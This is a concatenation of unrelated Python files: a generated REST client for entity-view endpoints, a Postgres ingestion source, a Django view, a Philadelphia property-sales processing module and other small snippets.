        query_params.append(('sortProperty', params['sort_property']))  # noqa: E501
    if 'sort_order' in params:
        query_params.append(('sortOrder', params['sort_order']))  # noqa: E501

    header_params = {}

    # This GET endpoint sends no form fields, files, or request body.
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['X-Authorization']  # noqa: E501

    # Delegate the actual HTTP exchange (and async handling) to the client.
    return self.api_client.call_api(
        '/api/tenant/entityViewInfos{?page,pageSize,sortOrder,sortProperty,textSearch,type}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='PageDataEntityViewInfo',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_tenant_entity_view_using_get(self, entity_view_name, **kwargs):  # noqa: E501
    """Get Entity View by name (getTenantEntityView)  # noqa: E501

    Fetch the Entity View object based on the tenant id and entity view name. Available for users with 'TENANT_ADMIN' authority.  # noqa: E501
    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request that returns the request thread.
    >>> thread = api.get_tenant_entity_view_using_get(entity_view_name, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str entity_view_name: Entity View name (required)
    :return: EntityView
    If the method is called asynchronously,
    returns the request thread.
    """
    # Callers of this wrapper always receive just the deserialized payload.
    kwargs['_return_http_data_only'] = True
    # Sync and async invocations alike simply forward to the detailed
    # variant, which yields either the payload or the request thread.
    return self.get_tenant_entity_view_using_get_with_http_info(entity_view_name, **kwargs)  # noqa: E501
def get_tenant_entity_view_using_get_with_http_info(self, entity_view_name, **kwargs):  # noqa: E501
    """Get Entity View by name (getTenantEntityView)  # noqa: E501
    Fetch the Entity View object based on the tenant id and entity view name. Available for users with 'TENANT_ADMIN' authority.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_tenant_entity_view_using_get_with_http_info(entity_view_name, async_req=True)
    >>> result = thread.get()
    :param async_req bool
    :param str entity_view_name: Entity View name (required)
    :return: EntityView
    If the method is called asynchronously,
    returns the request thread.
    """
    # Only the generic per-request options are accepted as kwargs here.
    all_params = ['entity_view_name']  # noqa: E501
    all_params.append('async_req')
    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    # NOTE: locals() snapshots everything bound so far (including 'self'
    # and 'all_params', which are never looked up below). Unknown keyword
    # arguments are rejected; known ones are merged into the snapshot.
    params = locals()
    for key, val in six.iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_tenant_entity_view_using_get" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'entity_view_name' is set
    if ('entity_view_name' not in params or
            params['entity_view_name'] is None):
        raise ValueError("Missing the required parameter `entity_view_name` when calling `get_tenant_entity_view_using_get`")  # noqa: E501

    # No parameter of this endpoint uses a collection format (csv/multi).
    collection_formats = {}

    # No path substitutions; the name is sent as a query parameter instead.
    path_params = {}

    query_params = []
    if 'entity_view_name' in params:
        query_params.append(('entityViewName', params['entity_view_name']))  # noqa: E501

    header_params = {}

    # This GET endpoint sends no form fields, files, or request body.
    form_params = []
    local_var_files = {}
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['application/json'])  # noqa: E501

    # Authentication setting
    auth_settings = ['X-Authorization']  # noqa: E501

    # Delegate the actual HTTP exchange (and async handling) to the client.
    return self.api_client.call_api(
        '/api/tenant/entityViews{?entityViewName}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_type='EntityView',  # noqa: E501
        auth_settings=auth_settings,
        async_req=params.get('async_req'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats=collection_formats)
def get_tenant_entity_views_using_get(self, page_size, page, **kwargs): # noqa: E501
"""Get Tenant Entity Views (getTenantEntityViews) # noqa: E501
Returns a page of entity views owned by tenant. Entity Views limit the degree of exposure of the Device or Asset telemetry and attributes to the Customers. Every Entity View references exactly one entity (device or asset) and defines telemetry and attribute keys that will be visible to the assigned Customer. As a Tenant Administrator you are able to create multiple EVs per Device or Asset and assign them to different Customers. You can specify parameters to filter the results. The result is wrapped with PageData object that allows you to iterate over result set using pagination. See the 'Model' tab of the Response Class for more details. Available for users with 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_tenant_entity_views_using_get(page_size, page, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int page_size: Maximum amount of entities in a one page (required)
:param int page: Sequence number of page starting from 0 (required)
:param str type: ## Entity View Filter Allows to filter entity views based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Concrete Mixer' entity views which name starts with 'CAT': ```json { \"type\": \"entityViewType\", \"entityViewType\": \"Concrete Mixer\", \"entityViewNameFilter\": \"CAT\" } ```
:param str text_search: The case insensitive 'startsWith' filter based on the entity view name.
:param str sort_property: Property of entity to sort by
:param str sort_order: Sort order. ASC (ASCENDING) or DESC (DESCENDING)
:return: PageDataEntityView
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_tenant_entity_views_using_get_with_http_info(page_size, page, **kwargs) # noqa: E501
else:
(data) = self.get_tenant_entity_views_using_get_with_http_info(page_size, page, **kwargs) # noqa: E501
return data
    def get_tenant_entity_views_using_get_with_http_info(self, page_size, page, **kwargs):  # noqa: E501
        """Get Tenant Entity Views (getTenantEntityViews) # noqa: E501

        Returns a page of entity views owned by tenant. Entity Views limit the degree of exposure of the Device or Asset telemetry and attributes to the Customers. Every Entity View references exactly one entity (device or asset) and defines telemetry and attribute keys that will be visible to the assigned Customer. As a Tenant Administrator you are able to create multiple EVs per Device or Asset and assign them to different Customers. You can specify parameters to filter the results. The result is wrapped with PageData object that allows you to iterate over result set using pagination. See the 'Model' tab of the Response Class for more details. Available for users with 'TENANT_ADMIN' authority. # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.get_tenant_entity_views_using_get_with_http_info(page_size, page, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param int page_size: Maximum amount of entities in a one page (required)
        :param int page: Sequence number of page starting from 0 (required)
        :param str type: ## Entity View Filter Allows to filter entity views based on their type and the **'starts with'** expression over their name. For example, this entity filter selects all 'Concrete Mixer' entity views which name starts with 'CAT': ```json { \"type\": \"entityViewType\", \"entityViewType\": \"Concrete Mixer\", \"entityViewNameFilter\": \"CAT\" } ```
        :param str text_search: The case insensitive 'startsWith' filter based on the entity view name.
        :param str sort_property: Property of entity to sort by
        :param str sort_order: Sort order. ASC (ASCENDING) or DESC (DESCENDING)
        :return: PageDataEntityView
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Full set of keyword arguments this generated endpoint accepts,
        # including the client-level bookkeeping flags.
        all_params = ['page_size', 'page', 'type', 'text_search', 'sort_property', 'sort_order']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # locals() captures page_size/page plus the kwargs dict; unknown
        # keywords are rejected up front so typos fail before any I/O.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method get_tenant_entity_views_using_get" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'page_size' is set
        if ('page_size' not in params or
                params['page_size'] is None):
            raise ValueError("Missing the required parameter `page_size` when calling `get_tenant_entity_views_using_get`")  # noqa: E501
        # verify the required parameter 'page' is set
        if ('page' not in params or
                params['page'] is None):
            raise ValueError("Missing the required parameter `page` when calling `get_tenant_entity_views_using_get`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        # Optional filters are only forwarded when explicitly supplied; note
        # the snake_case -> camelCase rename expected by the server.
        query_params = []
        if 'page_size' in params:
            query_params.append(('pageSize', params['page_size']))  # noqa: E501
        if 'page' in params:
            query_params.append(('page', params['page']))  # noqa: E501
        if 'type' in params:
            query_params.append(('type', params['type']))  # noqa: E501
        if 'text_search' in params:
            query_params.append(('textSearch', params['text_search']))  # noqa: E501
        if 'sort_property' in params:
            query_params.append(('sortProperty', params['sort_property']))  # noqa: E501
        if 'sort_order' in params:
            query_params.append(('sortOrder', params['sort_order']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['X-Authorization']  # noqa: E501

        return self.api_client.call_api(
            '/api/tenant/entityViews{?page,pageSize,sortOrder,sortProperty,textSearch,type}', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='PageDataEntityView',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def save_entity_view_using_post(self, **kwargs): # noqa: E501
"""Save or update entity view (saveEntityView) # noqa: E501
Entity Views limit the degree of exposure of the Device or Asset telemetry and attributes to the Customers. Every Entity View references exactly one entity (device or asset) and defines telemetry and attribute keys that will be visible to the assigned Customer. As a Tenant Administrator you are able to create multiple EVs per Device or Asset and assign them to different Customers. See the 'Model' tab for more details. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.save_entity_view_using_post(async_req=True)
>>> result = thread.get()
:param async_req bool
:param EntityView body:
:return: EntityView
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.save_entity_view_using_post_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.save_entity_view_using_post_with_http_info(**kwargs) # noqa: E501
return data
    def save_entity_view_using_post_with_http_info(self, **kwargs):  # noqa: E501
        """Save or update entity view (saveEntityView) # noqa: E501

        Entity Views limit the degree of exposure of the Device or Asset telemetry and attributes to the Customers. Every Entity View references exactly one entity (device or asset) and defines telemetry and attribute keys that will be visible to the assigned Customer. As a Tenant Administrator you are able to create multiple EVs per Device or Asset and assign them to different Customers. See the 'Model' tab for more details. # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.save_entity_view_using_post_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param EntityView body:
        :return: EntityView
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Only the JSON request body (plus the client bookkeeping flags) is
        # accepted by this endpoint.
        all_params = ['body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Reject unknown keyword arguments up front so typos fail fast.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method save_entity_view_using_post" % key
                )
            params[key] = val
        del params['kwargs']

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        # The EntityView payload travels as the JSON request body.
        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['X-Authorization']  # noqa: E501

        return self.api_client.call_api(
            '/api/entityView', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='EntityView',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def unassign_entity_view_from_customer_using_delete(self, entity_view_id, **kwargs): # noqa: E501
"""Unassign Entity View from customer (unassignEntityViewFromCustomer) # noqa: E501
Clears assignment of the Entity View to customer. Customer will not be able to query Entity View afterwards. Available for users with 'TENANT_ADMIN' authority. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.unassign_entity_view_from_customer_using_delete(entity_view_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str entity_view_id: A string value representing the entity view id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
:return: EntityView
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.unassign_entity_view_from_customer_using_delete_with_http_info(entity_view_id, **kwargs) # noqa: E501
else:
(data) = self.unassign_entity_view_from_customer_using_delete_with_http_info(entity_view_id, **kwargs) # noqa: E501
return data
    def unassign_entity_view_from_customer_using_delete_with_http_info(self, entity_view_id, **kwargs):  # noqa: E501
        """Unassign Entity View from customer (unassignEntityViewFromCustomer) # noqa: E501

        Clears assignment of the Entity View to customer. Customer will not be able to query Entity View afterwards. Available for users with 'TENANT_ADMIN' authority. # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.unassign_entity_view_from_customer_using_delete_with_http_info(entity_view_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str entity_view_id: A string value representing the entity view id. For example, '784f394c-42b6-435a-983c-b7beff2784f9' (required)
        :return: EntityView
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Accepted keyword arguments: the path parameter plus the client
        # bookkeeping flags.
        all_params = ['entity_view_id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Reject unknown keyword arguments up front so typos fail fast.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method unassign_entity_view_from_customer_using_delete" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'entity_view_id' is set
        if ('entity_view_id' not in params or
                params['entity_view_id'] is None):
            raise ValueError("Missing the required parameter `entity_view_id` when calling `unassign_entity_view_from_customer_using_delete`")  # noqa: E501

        collection_formats = {}

        # The entity view id is interpolated into the URL path, not the query.
        path_params = {}
        if 'entity_view_id' in params:
            path_params['entityViewId'] = params['entity_view_id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['X-Authorization']  # noqa: E501

        return self.api_client.call_api(
            '/api/customer/entityView/{entityViewId}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='EntityView',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
def unassign_entity_view_from_edge_using_delete(self, edge_id, entity_view_id, **kwargs): # noqa: E501
"""Unassign entity view from edge (unassignEntityViewFromEdge) # noqa: E501
Clears assignment of the entity view to the edge. Unassignment works in async way - first, 'unassign' notification event pushed to edge queue on platform. Second, remote edge service will receive an 'unassign' command to remove entity view (Edge will receive this instantly, if it's currently connected, or once it's going to be connected to platform). Third, once 'unassign' command will be delivered to edge service, it's going to remove entity view locally. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.unassign_entity_view_from_edge_using_delete(edge_id, entity_view_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str edge_id: edgeId (required)
:param str entity_view_id: entityViewId (required)
:return: EntityView
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.unassign_entity_view_from_edge_using_delete_with_http_info(edge_id, entity_view_id, **kwargs) # noqa: E501
else:
(data) = self.unassign_entity_view_from_edge_using_delete_with_http_info(edge_id, entity_view_id, **kwargs) # noqa: E501
return data
    def unassign_entity_view_from_edge_using_delete_with_http_info(self, edge_id, entity_view_id, **kwargs):  # noqa: E501
        """Unassign entity view from edge (unassignEntityViewFromEdge) # noqa: E501

        Clears assignment of the entity view to the edge. Unassignment works in async way - first, 'unassign' notification event pushed to edge queue on platform. Second, remote edge service will receive an 'unassign' command to remove entity view (Edge will receive this instantly, if it's currently connected, or once it's going to be connected to platform). Third, once 'unassign' command will be delivered to edge service, it's going to remove entity view locally. # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.unassign_entity_view_from_edge_using_delete_with_http_info(edge_id, entity_view_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str edge_id: edgeId (required)
        :param str entity_view_id: entityViewId (required)
        :return: EntityView
                 If the method is called asynchronously,
                 returns the request thread.
        """
        # Accepted keyword arguments: both path parameters plus the client
        # bookkeeping flags.
        all_params = ['edge_id', 'entity_view_id']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        # Reject unknown keyword arguments up front so typos fail fast.
        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method unassign_entity_view_from_edge_using_delete" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'edge_id' is set
        if ('edge_id' not in params or
                params['edge_id'] is None):
            raise ValueError("Missing the required parameter `edge_id` when calling `unassign_entity_view_from_edge_using_delete`")  # noqa: E501
        # verify the required parameter 'entity_view_id' is set
        if ('entity_view_id' not in params or
                params['entity_view_id'] is None):
            raise ValueError("Missing the required parameter `entity_view_id` when calling `unassign_entity_view_from_edge_using_delete`")  # noqa: E501

        collection_formats = {}

        # Both ids are interpolated into the URL path, not the query string.
        path_params = {}
        if 'edge_id' in params:
            path_params['edgeId'] = params['edge_id']  # noqa: E501
        if 'entity_view_id' in params:
            path_params['entityViewId'] = params['entity_view_id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['X-Authorization']  # noqa: E501

        return self.api_client.call_api(
            '/api/edge/{edgeId}/entityView/{entityViewId}', 'DELETE',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='EntityView',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
| StarcoderdataPython |
class FModifierFunctionGenerator:
    """Pure data stub for a function-generator F-modifier.

    The name matches Blender's ``FModifierFunctionGenerator`` F-curve
    modifier — presumably this mirrors that API; confirm against the
    consumer of this class. Every attribute is a class-level placeholder
    defaulting to ``None`` and is expected to be overwritten per instance.
    """

    # Scale factor of the generated function's output.
    amplitude = None
    # Selector for which function to generate — TODO confirm accepted values.
    function_type = None
    # Multiplier applied to the function's input (phase).
    phase_multiplier = None
    # Constant offset added to the function's input (phase).
    phase_offset = None
    # Flag; presumably whether values add to the curve rather than replace it.
    use_additive = None
    # Constant offset added to the function's output.
    value_offset = None
| StarcoderdataPython |
11206941 | # This import verifies that the dependencies are available.
import psycopg2 # noqa: F401
# GeoAlchemy adds support for PostGIS extensions in SQLAlchemy. In order to
# activate it, we must import it so that it can hook into SQLAlchemy. While
# we don't use the Geometry type that we import, we do care about the side
# effects of the import. For more details, see here:
# https://geoalchemy-2.readthedocs.io/en/latest/core_tutorial.html#reflecting-tables.
from geoalchemy2 import Geometry # noqa: F401
from .sql_common import BasicSQLAlchemyConfig, SQLAlchemySource
class PostgresConfig(BasicSQLAlchemyConfig):
    """Connection config for Postgres sources.

    Inherits host/credential handling from ``BasicSQLAlchemyConfig`` and only
    pins the SQLAlchemy URL scheme.
    """

    # defaults: use the psycopg2 DBAPI driver for SQLAlchemy URLs.
    scheme = "postgresql+psycopg2"
class PostgresSource(SQLAlchemySource):
    """SQLAlchemy-based ingestion source for PostgreSQL databases."""

    def __init__(self, config, ctx):
        # "postgresql" is the platform name passed to the generic
        # SQLAlchemy source machinery.
        super().__init__(config, ctx, "postgresql")

    @classmethod
    def create(cls, config_dict, ctx):
        """Alternate constructor: build a source from a raw config dict."""
        config = PostgresConfig.parse_obj(config_dict)
        return cls(config, ctx)
| StarcoderdataPython |
1733942 | from app.Process.process_update import RequestsDataFile
from app.Process.process_quest import StatisticsSearch
class Startup:
    """Console entry point for the Sars-Cov-2 data analysis system."""

    def __init__(self):
        self.datafile = RequestsDataFile()
        self.search = StatisticsSearch()

    def initial_menu(self):
        """Show the main menu and dispatch the chosen action.

        Option 1 updates the statistics data; any other choice (the
        original behaviour for anything but 1) opens the search workflow.
        """
        print("--------- Sars-Cov-2 data analysis system ------------\n"
              " 1 - Update statistics data from the system\n"
              " 2 - Search methods in updated data\n")
        try:
            option = int(input('Enter the desired action for the system: '))
        except ValueError:
            # The original crashed with an unhandled ValueError on
            # non-numeric input; treat it like any non-1 choice instead.
            option = 2
        if option == 1:
            self.datafile.update_database_data()
        else:
            self.search.choose_type_archive()
            self.search.method_menu()
| StarcoderdataPython |
1601264 | <filename>mysite/client/views.py
from django.http import HttpResponse
from django.shortcuts import render
# Create your views here.
# All Django wants returned is an HttpResponse. Or an exception.
def index(request):
    """Render the client landing page.

    Django views must return an HttpResponse (or raise). ``render`` builds
    one by loading the ``client/index.html`` template and rendering it with
    the given context mapping — empty here, since the page needs no
    template variables.
    """
    return render(request, 'client/index.html', {})
9684820 | <reponame>PhiladelphiaController/gun-violence
from .. import data_dir
from . import EPSG
from .core import geocode, Dataset
from .geo import *
from .fred import PhillyMSAHousingIndex
import os
from glob import glob
import pandas as pd
import geopandas as gpd
import numpy as np
try:
from phila_opa.db import OPAData00s
from phila_opa.select import residential
except:
OPAData00s = None
__all__ = ["ResidentialSales"]
def generate_sales_file(start_year=2006, end_year=2020, opa_data_dir=None):
    """
    Generate a sales file of all unique sales occuring between the specified dates.

    Parameters
    ----------
    start_year : int
        first tax year to include
    end_year : int
        last tax year to include (inclusive)
    opa_data_dir : str, optional
        directory holding the raw OPA data; defaults to a hard-coded
        local path, so this only runs on the author's machine

    Notes
    -----
    This includes only residential sales. Requires the optional
    ``phila_opa`` package; raises ValueError when it failed to import.
    """
    # initialize the database
    if opa_data_dir is None:
        opa_data_dir = "/Users/nicholashand/LocalWork/Data/OPA/"
    if OPAData00s is None:
        raise ValueError("sales file can only be generated on local machine")
    db = OPAData00s(data_dir=opa_data_dir)

    # do tax years 2006 through 2019
    out = []
    for tax_year in range(start_year, end_year + 1):
        print(f"Processing tax year {tax_year}...")
        # NOTE(review): geocoding is disabled for tax years >= 2020 —
        # confirm whether lat/lng is unavailable in those source files.
        df = db.load_tax_year(tax_year, geocode=tax_year < 2020)
        out.append(residential(df))

    # concatenate, only keeping overlapping columns
    out = pd.concat(out, axis=0, join="inner")
    print(" Total number of sales = ", len(out))

    # sort by tax_year, smallest to largest
    out = out.sort_values(by="tax_year", ascending=True)

    # remove duplicates: the same parcel/date/price triple appears in
    # several tax years, so keep only its first (earliest) occurrence
    out = out.drop_duplicates(
        subset=["parcel_number", "sale_date", "sale_price"], keep="first"
    )
    print(" Number of non-duplicated sales = ", len(out))

    # output directory
    dirname = os.path.join(data_dir, "OPA")
    if not os.path.exists(dirname):
        os.makedirs(dirname)

    # save!
    path = os.path.join(dirname, f"sales_file_{start_year}_to_{end_year}.csv")
    out.to_csv(path, index=False)

    return out
def generate_value_added_sales_by_year(start_year=2006, end_year=2018):
    """
    Generate the sales files by year with value-added columns.

    Parameters
    ----------
    start_year : int
        first sale year to write out
    end_year : int
        last sale year to write out (inclusive)

    Notes
    -----
    This takes the file of unique sales and adds several useful columns, including
    indexed housing prices and geocoded fields (zip codes, neighborhoods, and
    police districts). One CSV per sale year is written to OPA/ValueAdded.
    """
    # get the main sales file, generating it first if it does not exist yet
    matches = glob(os.path.join(data_dir, "OPA", "sales_file_*.csv"))
    if not len(matches):
        sales_data = generate_sales_file()
    else:
        sales_data = pd.read_csv(matches[0])

    # format the data:
    #  - parse sale dates and derive the sale year
    #  - compute price per square foot; the `test` column flags rows where
    #    it is finite and non-null, and the query/drop pair removes the rest
    #  - normalize the housing index to its maximum, then express each sale
    #    price in index-adjusted terms
    sales_data = (
        sales_data.assign(
            sale_date=lambda df: pd.to_datetime(df["sale_date"]),
            sale_year=lambda df: df.sale_date.dt.year,
            sale_price_psf=lambda df: df.sale_price / df.total_livable_area,
            test=lambda df: ~np.isinf(df.sale_price_psf) & df.sale_price_psf.notnull(),
            housing_index=lambda df: PhillyMSAHousingIndex.interpolate(df["sale_date"]),
        )
        .assign(
            housing_index=lambda df: df.housing_index / df.housing_index.max(),
            sale_price_indexed=lambda df: df.sale_price / df.housing_index,
        )
        .query("test == True")
        .drop(labels=["test"], axis=1)
    )

    # make sure the output directory exists
    dirname = os.path.join(data_dir, "OPA", "ValueAdded")
    if not os.path.exists(dirname):
        os.makedirs(dirname)

    # geocode! load each boundary layer once, outside the per-year loop
    zip_codes = ZIPCodes.get()
    neighborhoods = Neighborhoods.get()
    police_districts = PoliceDistricts.get()

    # save each year
    for year in range(start_year, end_year + 1):
        print(f"Processing sale year {year}...")

        # get this year's data
        df = sales_data.query("sale_year == @year")

        # convert to geopandas: build points from lng/lat (WGS84) and
        # reproject into the analysis CRS shared with the boundary layers
        gdf = (
            gpd.GeoDataFrame(
                df,
                geometry=gpd.points_from_xy(
                    df["lng"].astype(float), df["lat"].astype(float)
                ),
                crs={"init": "epsg:4326"},
            )
            .to_crs(epsg=EPSG)
            .drop(labels=["lat", "lng"], axis=1)
        )
        # drop any pre-existing zip_code column so the geocoded one wins
        if "zip_code" in gdf.columns:
            gdf = gdf.drop(labels=["zip_code"], axis=1)

        # geocode against each boundary layer in turn
        gdf = (
            gdf.pipe(geocode, zip_codes)
            .pipe(geocode, neighborhoods)
            .pipe(geocode, police_districts)
        )

        path = os.path.join(dirname, f"{year}.csv")
        gdf.to_csv(path, index=False)
def _get_IQR_limits(df, column, iqr_factor=1.5):
assert column in df.columns
# compute the inter quartile ratio
Q1 = df[column].quantile(0.25)
Q3 = df[column].quantile(0.75)
IQR = Q3 - Q1
# trim by lower and upper bounds
lower = Q1 - iqr_factor * IQR
upper = Q3 + iqr_factor * IQR
return lower, upper
def _remove_outliers(df, column, iqr_factor=1.5):
    """Return a copy of ``df`` restricted to rows whose ``column`` value lies
    within the Tukey fences computed by :func:`_get_IQR_limits` — strictly
    above the lower fence and at or below the upper one."""
    low, high = _get_IQR_limits(df, column, iqr_factor=iqr_factor)
    # Boolean masking selects exactly the rows the original
    # ``df.query("@lower < col <= @upper")`` expression kept.
    within_fences = (df[column] > low) & (df[column] <= high)
    return df[within_fences]
class ResidentialSales(Dataset):
    """
    Data for residential sales from 2006 to 2018, extracted from the OPA
    annual certified assessments.

    Notes
    -----
    These are trimmed to remove outliers on an annual basis using 1.5 times
    the interquartile range (IQR).
    """

    # Dataset options: write compressed output; parse sale_date as a date
    # when the cached CSV is re-read.
    compress = True
    date_columns = ["sale_date"]

    @classmethod
    def download(cls, **kwargs):
        """Assemble the trimmed sales dataframe from the per-year CSVs in
        OPA/ValueAdded, returning all years concatenated and sorted by
        sale date (newest first)."""
        files = glob(os.path.join(data_dir, "OPA", "ValueAdded", "*.csv"))

        out = []
        for f in files:

            # load the data:
            #  - keep only real transactions (sale_price > 1)
            #  - log-transform prices (raw and housing-index-adjusted)
            #  - flag condos via the "888" parcel-number prefix
            #  - time_offset = seconds since 2006-01-01 (UTC)
            df = (
                pd.read_csv(f, low_memory=False)
                .query("sale_price > 1")
                .assign(
                    sale_date=lambda df: pd.to_datetime(df.sale_date).dt.tz_localize(
                        "UTC"
                    ),
                    ln_sale_price=lambda df: np.log(df.sale_price),
                    ln_sale_price_indexed=lambda df: np.log(df.sale_price_indexed),
                    is_condo=lambda df: df.parcel_number.astype(str).str.startswith(
                        "888"
                    ),
                    time_offset=lambda df: (
                        df.sale_date - pd.to_datetime("1/1/2006").tz_localize("UTC")
                    )
                    .dt.total_seconds()
                    .values,
                )
                # trim outliers per input file, i.e. per sale year
                .pipe(_remove_outliers, "ln_sale_price")
            )
            out.append(df)

        return (
            pd.concat(out)
            .sort_values("sale_date", ascending=False)
            .reset_index(drop=True)
        )
| StarcoderdataPython |
4813983 | import os
import sys
from dotenv import load_dotenv
from mitto_sdk import Mitto
load_dotenv()
BASE_URL = os.getenv("MITTO_BASE_URL")
API_KEY = os.getenv("MITTO_API_KEY")
# Job definition posted to the Mitto API: a tagged SQL job that runs
# ``select 1`` against the local ``analytics`` Postgres database inside a
# single transaction.
JOB = {
    "name": "sql_select_1_from_api",
